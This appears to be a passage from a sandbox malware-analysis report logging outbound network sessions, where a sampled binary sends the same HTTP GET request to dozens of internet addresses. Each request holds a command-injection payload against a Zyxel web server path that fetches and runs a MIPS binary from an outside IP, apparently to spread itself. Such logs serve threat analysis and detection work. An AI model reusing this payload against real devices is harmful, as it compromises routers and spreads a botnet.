                                                      Feb 2, 2024 06:36:05.912904024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7580192.168.2.1437170104.146.148.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912961960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7581192.168.2.143628085.239.134.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912993908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7582192.168.2.1437666156.250.109.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913026094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7583192.168.2.144039483.192.2.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913062096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7584192.168.2.146011680.17.132.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913111925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7585192.168.2.145987414.200.4.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913160086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7586192.168.2.1434150137.47.221.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913176060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7587192.168.2.145734091.3.12.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913227081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7588192.168.2.143805227.106.150.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913254023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7589192.168.2.144311046.241.249.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913314104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7590192.168.2.144245095.36.2.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913362980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7591192.168.2.1438046171.140.159.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913403034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7592192.168.2.1454136218.44.167.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913440943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7593192.168.2.1445188220.234.229.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913480997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7594192.168.2.1435804152.94.19.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913505077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7595192.168.2.143395881.89.161.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913558006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7596192.168.2.1452272141.137.165.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913595915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7597192.168.2.1438212206.49.97.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913655043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7598192.168.2.145480651.161.21.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913686037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7599192.168.2.145875080.131.138.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913724899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7600192.168.2.145593260.35.57.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913748026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7601192.168.2.1451214213.117.75.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913801908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7602192.168.2.1436984154.230.185.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913830996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7603192.168.2.1456562128.212.73.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913892031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7604192.168.2.145847491.66.178.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913927078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7605192.168.2.144483619.64.45.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.913969040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7606192.168.2.143794096.152.163.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914004087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7607192.168.2.143332019.114.206.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914036989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7608192.168.2.144462269.254.139.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914073944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7609192.168.2.143567485.125.72.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914107084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7610192.168.2.143533624.133.20.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914153099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7611192.168.2.1460358138.196.7.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914170027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7612192.168.2.1457686122.240.180.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914237022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7613192.168.2.1458438111.220.145.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914263010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7614192.168.2.145765490.26.247.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914297104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7615192.168.2.145909679.182.35.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914324045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7616192.168.2.1449056185.167.84.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914372921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7617192.168.2.145108490.92.95.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914402008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7618192.168.2.1451468197.130.179.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914447069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7619192.168.2.144781617.46.225.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914493084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7620192.168.2.1448704124.44.178.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914536953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7621192.168.2.1453152183.206.240.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914566994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7622192.168.2.1460760161.10.94.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914608955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7623192.168.2.143733899.212.247.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914640903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7624192.168.2.1434784183.237.229.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914669991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7625192.168.2.143875027.22.8.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914714098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7626192.168.2.1440630103.124.254.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914767981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7627192.168.2.1432998217.37.192.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914803982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7628192.168.2.144684088.68.36.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914856911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7629192.168.2.145664443.170.176.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914891005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7630192.168.2.143997661.52.211.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914917946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7631192.168.2.1441972199.180.98.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.914956093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7632192.168.2.144641631.162.111.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915000916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7633192.168.2.143703034.41.210.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915035009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7634192.168.2.145201067.111.103.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915087938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7635192.168.2.1437228168.230.159.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915117025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7636192.168.2.1438026174.22.118.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915148973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7637192.168.2.1447686105.217.18.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915173054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7638192.168.2.1448790188.171.210.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915227890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7639192.168.2.1452900188.172.144.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915275097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7640192.168.2.1436616139.31.202.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915301085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7641192.168.2.143889095.64.200.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915357113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7642192.168.2.1458266135.85.184.185443
                                                      TimestampBytes transferredDirectionData
